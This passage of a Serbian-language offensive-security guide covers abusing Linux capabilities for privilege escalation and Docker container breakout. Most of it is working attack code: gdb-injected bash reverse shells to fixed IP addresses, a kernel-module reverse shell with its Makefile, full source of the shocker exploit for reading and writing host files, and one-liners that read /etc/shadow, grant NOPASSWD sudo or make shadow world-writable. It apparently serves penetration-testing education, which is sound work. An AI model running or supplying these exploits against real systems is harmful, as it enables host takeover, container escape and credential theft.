## NOTE that the process you abuse will die after the shellcode
|
||
/usr/bin/gdb -p $(pgrep sleep)
|
||
[...]
|
||
(gdb) source commands.gdb
|
||
Continuing.
|
||
process 207009 is executing new program: /usr/bin/dash
|
||
[...]
|
||
```
|
||
**Primer sa okruženjem (Docker breakout) - Još jedna zloupotreba gdb-a**
|
||
|
||
Ako je **GDB** instaliran (ili ga možete instalirati sa `apk add gdb` ili `apt install gdb`, na primer) možete **debug-ovati proces sa hosta** i naterati ga da pozove funkciju `system`. (Ova tehnika takođe zahteva sposobnost `SYS_ADMIN`)**.**
|
||
```bash
|
||
gdb -p 1234
|
||
(gdb) call (void)system("ls")
|
||
(gdb) call (void)system("sleep 5")
|
||
(gdb) call (void)system("bash -c 'bash -i >& /dev/tcp/192.168.115.135/5656 0>&1'")
|
||
```
|
||
Nećete moći da vidite izlaz komande koja je izvršena, ali će biti izvršena od strane tog procesa (tako da dobijete rev shell).
|
||
|
||
> [!WARNING]
|
||
> Ako dobijete grešku "No symbol "system" in current context." proverite prethodni primer učitavanja shellcode-a u program putem gdb-a.
|
||
|
||
**Primer sa okruženjem (Docker breakout) - Ubrizgavanje shellcode-a**
|
||
|
||
Možete proveriti omogućene sposobnosti unutar docker kontejnera koristeći:
|
||
```bash
|
||
capsh --print
|
||
Current: = cap_chown,cap_dac_override,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_net_bind_service,cap_net_raw,cap_sys_chroot,cap_sys_ptrace,cap_mknod,cap_audit_write,cap_setfcap+ep
|
||
Bounding set =cap_chown,cap_dac_override,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_net_bind_service,cap_net_raw,cap_sys_chroot,cap_sys_ptrace,cap_mknod,cap_audit_write,cap_setfcap
|
||
Securebits: 00/0x0/1'b0
|
||
secure-noroot: no (unlocked)
|
||
secure-no-suid-fixup: no (unlocked)
|
||
secure-keep-caps: no (unlocked)
|
||
uid=0(root)
|
||
gid=0(root)
|
||
groups=0(root
|
||
```
|
||
List **procesa** koji se izvršavaju na **hostu** `ps -eaf`
|
||
|
||
1. Dobijte **arhitekturu** `uname -m`
|
||
2. Pronađite **shellcode** za arhitekturu ([https://www.exploit-db.com/exploits/41128](https://www.exploit-db.com/exploits/41128))
|
||
3. Pronađite **program** za **ubacivanje** **shellcode** u memoriju procesa ([https://github.com/0x00pf/0x00sec_code/blob/master/mem_inject/infect.c](https://github.com/0x00pf/0x00sec_code/blob/master/mem_inject/infect.c))
|
||
4. **Izmenite** **shellcode** unutar programa i **kompajlirajte** ga `gcc inject.c -o inject`
|
||
5. **Ubacite** ga i uhvatite svoj **shell**: `./inject 299; nc 172.17.0.1 5600`
|
||
|
||
## CAP_SYS_MODULE
|
||
|
||
**[`CAP_SYS_MODULE`](https://man7.org/linux/man-pages/man7/capabilities.7.html)** omogućava procesu da **učitava i uklanja kernel module (`init_module(2)`, `finit_module(2)` i `delete_module(2)` sistemski pozivi)**, pružajući direktan pristup osnovnim operacijama kernela. Ova sposobnost predstavlja kritične bezbednosne rizike, jer omogućava eskalaciju privilegija i potpunu kompromitaciju sistema omogućavajući izmene u kernelu, čime se zaobilaze svi Linux bezbednosni mehanizmi, uključujući Linux Security Modules i izolaciju kontejnera.
|
||
**To znači da možete** **ubacivati/uklanjati kernel module u/iz kernela host mašine.**
|
||
|
||
**Primer sa binarnim fajlom**
|
||
|
||
U sledećem primeru binarni **`python`** ima ovu sposobnost.
|
||
```bash
|
||
getcap -r / 2>/dev/null
|
||
/usr/bin/python2.7 = cap_sys_module+ep
|
||
```
|
||
Podrazumevano, **`modprobe`** komanda proverava listu zavisnosti i map fajlove u direktorijumu **`/lib/modules/$(uname -r)`**.\
|
||
Da bismo to iskoristili, hajde da kreiramo lažni **lib/modules** folder:
|
||
```bash
|
||
mkdir lib/modules -p
|
||
cp -a /lib/modules/5.0.0-20-generic/ lib/modules/$(uname -r)
|
||
```
|
||
Zatim **kompajlirajte kernel modul koji možete pronaći u 2 primera ispod i kopirajte** ga u ovu fasciklu:
|
||
```bash
|
||
cp reverse-shell.ko lib/modules/$(uname -r)/
|
||
```
|
||
Na kraju, izvršite potrebni python kod za učitavanje ovog kernel modula:
|
||
```python
|
||
import kmod
|
||
km = kmod.Kmod()
|
||
km.set_mod_dir("/path/to/fake/lib/modules/5.0.0-20-generic/")
|
||
km.modprobe("reverse-shell")
|
||
```
|
||
**Primer 2 sa binarnim fajlom**
|
||
|
||
U sledećem primeru, binarni fajl **`kmod`** ima ovu sposobnost.
|
||
```bash
|
||
getcap -r / 2>/dev/null
|
||
/bin/kmod = cap_sys_module+ep
|
||
```
|
||
Što znači da je moguće koristiti komandu **`insmod`** za umetanje kernel modula. Pratite primer u nastavku da dobijete **reverse shell** zloupotrebljavajući ovu privilegiju.
|
||
|
||
**Primer sa okruženjem (Docker breakout)**
|
||
|
||
Možete proveriti omogućene sposobnosti unutar docker kontejnera koristeći:
|
||
```bash
|
||
capsh --print
|
||
Current: = cap_chown,cap_dac_override,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_net_bind_service,cap_net_raw,cap_sys_module,cap_sys_chroot,cap_mknod,cap_audit_write,cap_setfcap+ep
|
||
Bounding set =cap_chown,cap_dac_override,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_net_bind_service,cap_net_raw,cap_sys_module,cap_sys_chroot,cap_mknod,cap_audit_write,cap_setfcap
|
||
Securebits: 00/0x0/1'b0
|
||
secure-noroot: no (unlocked)
|
||
secure-no-suid-fixup: no (unlocked)
|
||
secure-keep-caps: no (unlocked)
|
||
uid=0(root)
|
||
gid=0(root)
|
||
groups=0(root)
|
||
```
|
||
Unutar prethodnog izlaza možete videti da je **SYS_MODULE** sposobnost omogućena.
|
||
|
||
**Kreirajte** **kernel modul** koji će izvršiti reverznu ljusku i **Makefile** za **kompilaciju**:
|
||
```c:reverse-shell.c
|
||
#include <linux/kmod.h>
|
||
#include <linux/module.h>
|
||
MODULE_LICENSE("GPL");
|
||
MODULE_AUTHOR("AttackDefense");
|
||
MODULE_DESCRIPTION("LKM reverse shell module");
|
||
MODULE_VERSION("1.0");
|
||
|
||
char* argv[] = {"/bin/bash","-c","bash -i >& /dev/tcp/10.10.14.8/4444 0>&1", NULL};
|
||
static char* envp[] = {"PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin", NULL };
|
||
|
||
// call_usermodehelper function is used to create user mode processes from kernel space
|
||
static int __init reverse_shell_init(void) {
|
||
return call_usermodehelper(argv[0], argv, envp, UMH_WAIT_EXEC);
|
||
}
|
||
|
||
static void __exit reverse_shell_exit(void) {
|
||
printk(KERN_INFO "Exiting\n");
|
||
}
|
||
|
||
module_init(reverse_shell_init);
|
||
module_exit(reverse_shell_exit);
|
||
```
|
||
|
||
```bash:Makefile
|
||
obj-m +=reverse-shell.o
|
||
|
||
all:
|
||
make -C /lib/modules/$(shell uname -r)/build M=$(PWD) modules
|
||
|
||
clean:
|
||
make -C /lib/modules/$(shell uname -r)/build M=$(PWD) clean
|
||
```
|
||
> [!WARNING]
|
||
> Prazan karakter pre svake reči make u Makefile **mora biti tab, a ne razmaci**!
|
||
|
||
Izvršite `make` da biste ga kompajlirali.
|
||
```
|
||
ake[1]: *** /lib/modules/5.10.0-kali7-amd64/build: No such file or directory. Stop.
|
||
|
||
sudo apt update
|
||
sudo apt full-upgrade
|
||
```
|
||
Na kraju, pokrenite `nc` unutar ljuske i **učitajte modul** iz druge i uhvatićete ljusku u nc procesu:
|
||
```bash
|
||
#Shell 1
|
||
nc -lvnp 4444
|
||
|
||
#Shell 2
|
||
insmod reverse-shell.ko #Launch the reverse shell
|
||
```
|
||
**Kod ove tehnike je kopiran iz laboratorije "Zloupotreba SYS_MODULE sposobnosti" sa** [**https://www.pentesteracademy.com/**](https://www.pentesteracademy.com)
|
||
|
||
Još jedan primer ove tehnike može se naći na [https://www.cyberark.com/resources/threat-research-blog/how-i-hacked-play-with-docker-and-remotely-ran-code-on-the-host](https://www.cyberark.com/resources/threat-research-blog/how-i-hacked-play-with-docker-and-remotely-ran-code-on-the-host)
|
||
|
||
## CAP_DAC_READ_SEARCH
|
||
|
||
[**CAP_DAC_READ_SEARCH**](https://man7.org/linux/man-pages/man7/capabilities.7.html) omogućava procesu da **zaobiđe dozvole za čitanje datoteka i za čitanje i izvršavanje direktorijuma**. Njegova primarna upotreba je za pretragu ili čitanje datoteka. Međutim, takođe omogućava procesu da koristi funkciju `open_by_handle_at(2)`, koja može pristupiti bilo kojoj datoteci, uključujući one van prostora montiranja procesa. Rukohvat korišćen u `open_by_handle_at(2)` treba da bude netransparentni identifikator dobijen putem `name_to_handle_at(2)`, ali može uključivati osetljive informacije poput inode brojeva koji su podložni manipulaciji. Potencijal za eksploataciju ove sposobnosti, posebno u kontekstu Docker kontejnera, demonstrirao je Sebastian Krahmer sa shocker exploit-om, kako je analizirano [ovde](https://medium.com/@fun_cuddles/docker-breakout-exploit-analysis-a274fff0e6b3).
|
||
**To znači da možete** **zaobići provere dozvola za čitanje datoteka i provere dozvola za čitanje/izvršavanje direktorijuma.**
|
||
|
||
**Primer sa binarnim fajlom**
|
||
|
||
Binarni fajl će moći da čita bilo koju datoteku. Dakle, ako datoteka poput tar ima ovu sposobnost, moći će da pročita shadow datoteku:
|
||
```bash
|
||
cd /etc
|
||
tar -czf /tmp/shadow.tar.gz shadow #Compress show file in /tmp
|
||
cd /tmp
|
||
tar -cxf shadow.tar.gz
|
||
```
|
||
**Primer sa binary2**
|
||
|
||
U ovom slučaju pretpostavimo da **`python`** binarni fajl ima ovu sposobnost. Da biste naveli root fajlove, mogli biste uraditi:
|
||
```python
|
||
import os
|
||
for r, d, f in os.walk('/root'):
|
||
for filename in f:
|
||
print(filename)
|
||
```
|
||
I da biste pročitali datoteku, mogli biste uraditi:
|
||
```python
|
||
print(open("/etc/shadow", "r").read())
|
||
```
|
||
**Primer u okruženju (Docker izlaz)**
|
||
|
||
Možete proveriti omogućene sposobnosti unutar docker kontejnera koristeći:
|
||
```
|
||
capsh --print
|
||
Current: = cap_chown,cap_dac_override,cap_dac_read_search,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_net_bind_service,cap_net_raw,cap_sys_chroot,cap_mknod,cap_audit_write,cap_setfcap+ep
|
||
Bounding set =cap_chown,cap_dac_override,cap_dac_read_search,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_net_bind_service,cap_net_raw,cap_sys_chroot,cap_mknod,cap_audit_write,cap_setfcap
|
||
Securebits: 00/0x0/1'b0
|
||
secure-noroot: no (unlocked)
|
||
secure-no-suid-fixup: no (unlocked)
|
||
secure-keep-caps: no (unlocked)
|
||
uid=0(root)
|
||
gid=0(root)
|
||
groups=0(root)
|
||
```
|
||
Unutar prethodnog izlaza možete videti da je **DAC_READ_SEARCH** sposobnost omogućena. Kao rezultat, kontejner može **debug-ovati procese**.
|
||
|
||
Možete saznati kako sledeće iskorišćavanje funkcioniše u [https://medium.com/@fun_cuddles/docker-breakout-exploit-analysis-a274fff0e6b3](https://medium.com/@fun_cuddles/docker-breakout-exploit-analysis-a274fff0e6b3), ali u sažetku **CAP_DAC_READ_SEARCH** ne samo da nam omogućava da prolazimo kroz fajl sistem bez provere dozvola, već takođe eksplicitno uklanja sve provere za _**open_by_handle_at(2)**_ i **može omogućiti našem procesu pristup osetljivim fajlovima koje su otvorili drugi procesi**.
|
||
|
||
Originalni exploit koji zloupotrebljava ove dozvole za čitanje fajlova sa hosta može se pronaći ovde: [http://stealth.openwall.net/xSports/shocker.c](http://stealth.openwall.net/xSports/shocker.c), sledeći je **modifikovana verzija koja vam omogućava da navedete fajl koji želite da pročitate kao prvi argument i da ga sačuvate u fajl.**
|
||
```c
|
||
#include <stdio.h>
|
||
#include <sys/types.h>
|
||
#include <sys/stat.h>
|
||
#include <fcntl.h>
|
||
#include <errno.h>
|
||
#include <stdlib.h>
|
||
#include <string.h>
|
||
#include <unistd.h>
|
||
#include <dirent.h>
|
||
#include <stdint.h>
|
||
|
||
// gcc shocker.c -o shocker
|
||
// ./socker /etc/shadow shadow #Read /etc/shadow from host and save result in shadow file in current dir
|
||
|
||
struct my_file_handle {
|
||
unsigned int handle_bytes;
|
||
int handle_type;
|
||
unsigned char f_handle[8];
|
||
};
|
||
|
||
void die(const char *msg)
|
||
{
|
||
perror(msg);
|
||
exit(errno);
|
||
}
|
||
|
||
void dump_handle(const struct my_file_handle *h)
|
||
{
|
||
fprintf(stderr,"[*] #=%d, %d, char nh[] = {", h->handle_bytes,
|
||
h->handle_type);
|
||
for (int i = 0; i < h->handle_bytes; ++i) {
|
||
fprintf(stderr,"0x%02x", h->f_handle[i]);
|
||
if ((i + 1) % 20 == 0)
|
||
fprintf(stderr,"\n");
|
||
if (i < h->handle_bytes - 1)
|
||
fprintf(stderr,", ");
|
||
}
|
||
fprintf(stderr,"};\n");
|
||
}
|
||
|
||
int find_handle(int bfd, const char *path, const struct my_file_handle *ih, struct my_file_handle
|
||
*oh)
|
||
{
|
||
int fd;
|
||
uint32_t ino = 0;
|
||
struct my_file_handle outh = {
|
||
.handle_bytes = 8,
|
||
.handle_type = 1
|
||
};
|
||
DIR *dir = NULL;
|
||
struct dirent *de = NULL;
|
||
path = strchr(path, '/');
|
||
// recursion stops if path has been resolved
|
||
if (!path) {
|
||
memcpy(oh->f_handle, ih->f_handle, sizeof(oh->f_handle));
|
||
oh->handle_type = 1;
|
||
oh->handle_bytes = 8;
|
||
return 1;
|
||
}
|
||
|
||
++path;
|
||
fprintf(stderr, "[*] Resolving '%s'\n", path);
|
||
if ((fd = open_by_handle_at(bfd, (struct file_handle *)ih, O_RDONLY)) < 0)
|
||
die("[-] open_by_handle_at");
|
||
if ((dir = fdopendir(fd)) == NULL)
|
||
die("[-] fdopendir");
|
||
for (;;) {
|
||
de = readdir(dir);
|
||
if (!de)
|
||
break;
|
||
fprintf(stderr, "[*] Found %s\n", de->d_name);
|
||
if (strncmp(de->d_name, path, strlen(de->d_name)) == 0) {
|
||
fprintf(stderr, "[+] Match: %s ino=%d\n", de->d_name, (int)de->d_ino);
|
||
ino = de->d_ino;
|
||
break;
|
||
}
|
||
}
|
||
|
||
fprintf(stderr, "[*] Brute forcing remaining 32bit. This can take a while...\n");
|
||
if (de) {
|
||
for (uint32_t i = 0; i < 0xffffffff; ++i) {
|
||
outh.handle_bytes = 8;
|
||
outh.handle_type = 1;
|
||
memcpy(outh.f_handle, &ino, sizeof(ino));
|
||
memcpy(outh.f_handle + 4, &i, sizeof(i));
|
||
if ((i % (1<<20)) == 0)
|
||
fprintf(stderr, "[*] (%s) Trying: 0x%08x\n", de->d_name, i);
|
||
if (open_by_handle_at(bfd, (struct file_handle *)&outh, 0) > 0) {
|
||
closedir(dir);
|
||
close(fd);
|
||
dump_handle(&outh);
|
||
return find_handle(bfd, path, &outh, oh);
|
||
}
|
||
}
|
||
}
|
||
closedir(dir);
|
||
close(fd);
|
||
return 0;
|
||
}
|
||
|
||
|
||
int main(int argc,char* argv[] )
|
||
{
|
||
char buf[0x1000];
|
||
int fd1, fd2;
|
||
struct my_file_handle h;
|
||
struct my_file_handle root_h = {
|
||
.handle_bytes = 8,
|
||
.handle_type = 1,
|
||
.f_handle = {0x02, 0, 0, 0, 0, 0, 0, 0}
|
||
};
|
||
|
||
fprintf(stderr, "[***] docker VMM-container breakout Po(C) 2014 [***]\n"
|
||
"[***] The tea from the 90's kicks your sekurity again. [***]\n"
|
||
"[***] If you have pending sec consulting, I'll happily [***]\n"
|
||
"[***] forward to my friends who drink secury-tea too! [***]\n\n<enter>\n");
|
||
|
||
read(0, buf, 1);
|
||
|
||
// get a FS reference from something mounted in from outside
|
||
if ((fd1 = open("/etc/hostname", O_RDONLY)) < 0)
|
||
die("[-] open");
|
||
|
||
if (find_handle(fd1, argv[1], &root_h, &h) <= 0)
|
||
die("[-] Cannot find valid handle!");
|
||
|
||
fprintf(stderr, "[!] Got a final handle!\n");
|
||
dump_handle(&h);
|
||
|
||
if ((fd2 = open_by_handle_at(fd1, (struct file_handle *)&h, O_RDONLY)) < 0)
|
||
die("[-] open_by_handle");
|
||
|
||
memset(buf, 0, sizeof(buf));
|
||
if (read(fd2, buf, sizeof(buf) - 1) < 0)
|
||
die("[-] read");
|
||
|
||
printf("Success!!\n");
|
||
|
||
FILE *fptr;
|
||
fptr = fopen(argv[2], "w");
|
||
fprintf(fptr,"%s", buf);
|
||
fclose(fptr);
|
||
|
||
close(fd2); close(fd1);
|
||
|
||
return 0;
|
||
}
|
||
```
|
||
> [!WARNING]
|
||
> Eksploit treba da pronađe pokazivač na nešto montirano na hostu. Originalni exploit je koristio datoteku /.dockerinit, a ova modifikovana verzija koristi /etc/hostname. Ako exploit ne radi, možda treba da postavite drugu datoteku. Da biste pronašli datoteku koja je montirana na hostu, jednostavno izvršite mount komandu:
|
||
|
||
 (1).png>)
|
||
|
||
**Kod ove tehnike je kopiran iz laboratorije "Abusing DAC_READ_SEARCH Capability" sa** [**https://www.pentesteracademy.com/**](https://www.pentesteracademy.com)
|
||
|
||
## CAP_DAC_OVERRIDE
|
||
|
||
**To znači da možete zaobići provere dozvola za pisanje na bilo kojoj datoteci, tako da možete pisati na bilo koju datoteku.**
|
||
|
||
Postoji mnogo datoteka koje možete **prepisati da biste eskalirali privilegije,** [**možete dobiti ideje ovde**](payloads-to-execute.md#overwriting-a-file-to-escalate-privileges).
|
||
|
||
**Primer sa binarnim fajlom**
|
||
|
||
U ovom primeru vim ima ovu sposobnost, tako da možete modifikovati bilo koju datoteku kao što su _passwd_, _sudoers_ ili _shadow_:
|
||
```bash
|
||
getcap -r / 2>/dev/null
|
||
/usr/bin/vim = cap_dac_override+ep
|
||
|
||
vim /etc/sudoers #To overwrite it
|
||
```
|
||
**Primer sa binarnim 2**
|
||
|
||
U ovom primeru **`python`** binarni fajl će imati ovu sposobnost. Možete koristiti python da prepišete bilo koji fajl:
|
||
```python
|
||
file=open("/etc/sudoers","a")
|
||
file.write("yourusername ALL=(ALL) NOPASSWD:ALL")
|
||
file.close()
|
||
```
|
||
**Primer sa okruženjem + CAP_DAC_READ_SEARCH (Docker izlaz)**
|
||
|
||
Možete proveriti omogućene sposobnosti unutar docker kontejnera koristeći:
|
||
```bash
|
||
capsh --print
|
||
Current: = cap_chown,cap_dac_override,cap_dac_read_search,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_net_bind_service,cap_net_raw,cap_sys_chroot,cap_mknod,cap_audit_write,cap_setfcap+ep
|
||
Bounding set =cap_chown,cap_dac_override,cap_dac_read_search,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_net_bind_service,cap_net_raw,cap_sys_chroot,cap_mknod,cap_audit_write,cap_setfcap
|
||
Securebits: 00/0x0/1'b0
|
||
secure-noroot: no (unlocked)
|
||
secure-no-suid-fixup: no (unlocked)
|
||
secure-keep-caps: no (unlocked)
|
||
uid=0(root)
|
||
gid=0(root)
|
||
groups=0(root)
|
||
```
|
||
Prvo pročitajte prethodni odeljak koji [**zloupotrebljava DAC_READ_SEARCH sposobnost za čitanje proizvoljnih fajlova**](linux-capabilities.md#cap_dac_read_search) hosta i **kompajlirajte** eksploataciju.\
|
||
Zatim, **kompajlirajte sledeću verziju shocker eksploatacije** koja će vam omogućiti da **pišete proizvoljne fajlove** unutar fajl sistema hosta:
|
||
```c
|
||
#include <stdio.h>
|
||
#include <sys/types.h>
|
||
#include <sys/stat.h>
|
||
#include <fcntl.h>
|
||
#include <errno.h>
|
||
#include <stdlib.h>
|
||
#include <string.h>
|
||
#include <unistd.h>
|
||
#include <dirent.h>
|
||
#include <stdint.h>
|
||
|
||
// gcc shocker_write.c -o shocker_write
|
||
// ./shocker_write /etc/passwd passwd
|
||
|
||
struct my_file_handle {
|
||
unsigned int handle_bytes;
|
||
int handle_type;
|
||
unsigned char f_handle[8];
|
||
};
|
||
void die(const char * msg) {
|
||
perror(msg);
|
||
exit(errno);
|
||
}
|
||
void dump_handle(const struct my_file_handle * h) {
|
||
fprintf(stderr, "[*] #=%d, %d, char nh[] = {", h -> handle_bytes,
|
||
h -> handle_type);
|
||
for (int i = 0; i < h -> handle_bytes; ++i) {
|
||
fprintf(stderr, "0x%02x", h -> f_handle[i]);
|
||
if ((i + 1) % 20 == 0)
|
||
fprintf(stderr, "\n");
|
||
if (i < h -> handle_bytes - 1)
|
||
fprintf(stderr, ", ");
|
||
}
|
||
fprintf(stderr, "};\n");
|
||
}
|
||
int find_handle(int bfd, const char *path, const struct my_file_handle *ih, struct my_file_handle *oh)
|
||
{
|
||
int fd;
|
||
uint32_t ino = 0;
|
||
struct my_file_handle outh = {
|
||
.handle_bytes = 8,
|
||
.handle_type = 1
|
||
};
|
||
DIR * dir = NULL;
|
||
struct dirent * de = NULL;
|
||
path = strchr(path, '/');
|
||
// recursion stops if path has been resolved
|
||
if (!path) {
|
||
memcpy(oh -> f_handle, ih -> f_handle, sizeof(oh -> f_handle));
|
||
oh -> handle_type = 1;
|
||
oh -> handle_bytes = 8;
|
||
return 1;
|
||
}
|
||
++path;
|
||
fprintf(stderr, "[*] Resolving '%s'\n", path);
|
||
if ((fd = open_by_handle_at(bfd, (struct file_handle * ) ih, O_RDONLY)) < 0)
|
||
die("[-] open_by_handle_at");
|
||
if ((dir = fdopendir(fd)) == NULL)
|
||
die("[-] fdopendir");
|
||
for (;;) {
|
||
de = readdir(dir);
|
||
if (!de)
|
||
break;
|
||
fprintf(stderr, "[*] Found %s\n", de -> d_name);
|
||
if (strncmp(de -> d_name, path, strlen(de -> d_name)) == 0) {
|
||
fprintf(stderr, "[+] Match: %s ino=%d\n", de -> d_name, (int) de -> d_ino);
|
||
ino = de -> d_ino;
|
||
break;
|
||
}
|
||
}
|
||
fprintf(stderr, "[*] Brute forcing remaining 32bit. This can take a while...\n");
|
||
if (de) {
|
||
for (uint32_t i = 0; i < 0xffffffff; ++i) {
|
||
outh.handle_bytes = 8;
|
||
outh.handle_type = 1;
|
||
memcpy(outh.f_handle, & ino, sizeof(ino));
|
||
memcpy(outh.f_handle + 4, & i, sizeof(i));
|
||
if ((i % (1 << 20)) == 0)
|
||
fprintf(stderr, "[*] (%s) Trying: 0x%08x\n", de -> d_name, i);
|
||
if (open_by_handle_at(bfd, (struct file_handle * ) & outh, 0) > 0) {
|
||
closedir(dir);
|
||
close(fd);
|
||
dump_handle( & outh);
|
||
return find_handle(bfd, path, & outh, oh);
|
||
}
|
||
}
|
||
}
|
||
closedir(dir);
|
||
close(fd);
|
||
return 0;
|
||
}
|
||
int main(int argc, char * argv[]) {
|
||
char buf[0x1000];
|
||
int fd1, fd2;
|
||
struct my_file_handle h;
|
||
struct my_file_handle root_h = {
|
||
.handle_bytes = 8,
|
||
.handle_type = 1,
|
||
.f_handle = {
|
||
0x02,
|
||
0,
|
||
0,
|
||
0,
|
||
0,
|
||
0,
|
||
0,
|
||
0
|
||
}
|
||
};
|
||
fprintf(stderr, "[***] docker VMM-container breakout Po(C) 2014 [***]\n"
|
||
"[***] The tea from the 90's kicks your sekurity again. [***]\n"
|
||
"[***] If you have pending sec consulting, I'll happily [***]\n"
|
||
"[***] forward to my friends who drink secury-tea too! [***]\n\n<enter>\n");
|
||
read(0, buf, 1);
|
||
// get a FS reference from something mounted in from outside
|
||
if ((fd1 = open("/etc/hostname", O_RDONLY)) < 0)
|
||
die("[-] open");
|
||
if (find_handle(fd1, argv[1], & root_h, & h) <= 0)
|
||
die("[-] Cannot find valid handle!");
|
||
fprintf(stderr, "[!] Got a final handle!\n");
|
||
dump_handle( & h);
|
||
if ((fd2 = open_by_handle_at(fd1, (struct file_handle * ) & h, O_RDWR)) < 0)
|
||
die("[-] open_by_handle");
|
||
char * line = NULL;
|
||
size_t len = 0;
|
||
FILE * fptr;
|
||
ssize_t read;
|
||
fptr = fopen(argv[2], "r");
|
||
while ((read = getline( & line, & len, fptr)) != -1) {
|
||
write(fd2, line, read);
|
||
}
|
||
printf("Success!!\n");
|
||
close(fd2);
|
||
close(fd1);
|
||
return 0;
|
||
}
|
||
```
|
||
Da biste izašli iz docker kontejnera, možete **preuzeti** datoteke `/etc/shadow` i `/etc/passwd` sa hosta, **dodati** im **novog korisnika** i koristiti **`shocker_write`** da ih prepišete. Zatim, **pristupite** putem **ssh**.
|
||
|
||
**Kod ove tehnike je kopiran iz laboratorije "Abusing DAC_OVERRIDE Capability" sa** [**https://www.pentesteracademy.com**](https://www.pentesteracademy.com)
|
||
|
||
## CAP_CHOWN
|
||
|
||
**To znači da je moguće promeniti vlasništvo bilo koje datoteke.**
|
||
|
||
**Primer sa binarnim fajlom**
|
||
|
||
Pretpostavimo da **`python`** binarni fajl ima ovu sposobnost, možete **promeniti** **vlasnika** **shadow** datoteke, **promeniti root lozinku** i eskalirati privilegije:
|
||
```bash
|
||
python -c 'import os;os.chown("/etc/shadow",1000,1000)'
|
||
```
|
||
Ili sa **`ruby`** binarnim fajlom koji ima ovu sposobnost:
|
||
```bash
|
||
ruby -e 'require "fileutils"; FileUtils.chown(1000, 1000, "/etc/shadow")'
|
||
```
|
||
## CAP_FOWNER
|
||
|
||
**To znači da je moguće promeniti dozvole bilo koje datoteke.**
|
||
|
||
**Primer sa binarnim fajlom**
|
||
|
||
Ako python ima ovu sposobnost, možete modifikovati dozvole fajla shadow, **promeniti root lozinku** i eskalirati privilegije:
|
||
```bash
|
||
python -c 'import os;os.chmod("/etc/shadow",0666)
|
||
```
|
||
### CAP_SETUID
|
||
|
||
**To znači da je moguće postaviti efektivni korisnički ID kreiranog procesa.**
|
||
|
||
**Primer sa binarnim fajlom**
|
||
|
||
Ako python ima ovu **kapacitet**, možete vrlo lako zloupotrebiti to da eskalirate privilegije na root:
|
||
```python
|
||
import os
|
||
os.setuid(0)
|
||
os.system("/bin/bash")
|
||
```
|
||
**Još jedan način:**
|
||
```python
|
||
import os
|
||
import prctl
|
||
#add the capability to the effective set
|
||
prctl.cap_effective.setuid = True
|
||
os.setuid(0)
|
||
os.system("/bin/bash")
|
||
```
|
||
## CAP_SETGID
|
||
|
||
**To znači da je moguće postaviti efektivni grupni ID kreiranog procesa.**
|
||
|
||
Postoji mnogo fajlova koje možete **prepisati da biste eskalirali privilegije,** [**možete dobiti ideje odavde**](payloads-to-execute.md#overwriting-a-file-to-escalate-privileges).
|
||
|
||
**Primer sa binarnim fajlom**
|
||
|
||
U ovom slučaju trebate tražiti zanimljive fajlove koje grupa može da čita jer možete imitirati bilo koju grupu:
|
||
```bash
|
||
#Find every file writable by a group
|
||
find / -perm /g=w -exec ls -lLd {} \; 2>/dev/null
|
||
#Find every file writable by a group in /etc with a maxpath of 1
|
||
find /etc -maxdepth 1 -perm /g=w -exec ls -lLd {} \; 2>/dev/null
|
||
#Find every file readable by a group in /etc with a maxpath of 1
|
||
find /etc -maxdepth 1 -perm /g=r -exec ls -lLd {} \; 2>/dev/null
|
||
```
|
||
Kada pronađete datoteku koju možete zloupotrebiti (čitanjem ili pisanjem) da biste eskalirali privilegije, možete **dobiti shell koji se pretvara da pripada interesantnoj grupi** sa:
|
||
```python
|
||
import os
|
||
os.setgid(42)
|
||
os.system("/bin/bash")
|
||
```
|
||
U ovom slučaju, grupa shadow je imitirala, tako da možete pročitati datoteku `/etc/shadow`:
|
||
```bash
|
||
cat /etc/shadow
|
||
```
|
||
Ako je **docker** instaliran, možete **imitirati** **docker grupu** i zloupotrebiti je da komunicirate sa [**docker socket-om** i eskalirate privilegije](./#writable-docker-socket).
|
||
|
||
## CAP_SETFCAP
|
||
|
||
**To znači da je moguće postaviti sposobnosti na datoteke i procese**
|
||
|
||
**Primer sa binarnim fajlom**
|
||
|
||
Ako python ima ovu **sposobnost**, možete je vrlo lako zloupotrebiti da eskalirate privilegije na root:
|
||
```python:setcapability.py
|
||
import ctypes, sys
|
||
|
||
#Load needed library
|
||
#You can find which library you need to load checking the libraries of local setcap binary
|
||
# ldd /sbin/setcap
|
||
libcap = ctypes.cdll.LoadLibrary("libcap.so.2")
|
||
|
||
libcap.cap_from_text.argtypes = [ctypes.c_char_p]
|
||
libcap.cap_from_text.restype = ctypes.c_void_p
|
||
libcap.cap_set_file.argtypes = [ctypes.c_char_p,ctypes.c_void_p]
|
||
|
||
#Give setuid cap to the binary
|
||
cap = 'cap_setuid+ep'
|
||
path = sys.argv[1]
|
||
print(path)
|
||
cap_t = libcap.cap_from_text(cap)
|
||
status = libcap.cap_set_file(path,cap_t)
|
||
|
||
if(status == 0):
|
||
print (cap + " was successfully added to " + path)
|
||
```
|
||
|
||
```bash
|
||
python setcapability.py /usr/bin/python2.7
|
||
```
|
||
> [!WARNING]
|
||
> Imajte na umu da ako postavite novu sposobnost za binarni fajl sa CAP_SETFCAP, izgubićete ovu sposobnost.
|
||
|
||
Kada dobijete [SETUID sposobnost](linux-capabilities.md#cap_setuid), možete otići na njen deo da vidite kako da eskalirate privilegije.
|
||
|
||
**Primer sa okruženjem (Docker breakout)**
|
||
|
||
Podrazumevano, sposobnost **CAP_SETFCAP se dodeljuje procesu unutar kontejnera u Dockeru**. To možete proveriti radeći nešto poput:
|
||
```bash
|
||
cat /proc/`pidof bash`/status | grep Cap
|
||
CapInh: 00000000a80425fb
|
||
CapPrm: 00000000a80425fb
|
||
CapEff: 00000000a80425fb
|
||
CapBnd: 00000000a80425fb
|
||
CapAmb: 0000000000000000
|
||
|
||
capsh --decode=00000000a80425fb
|
||
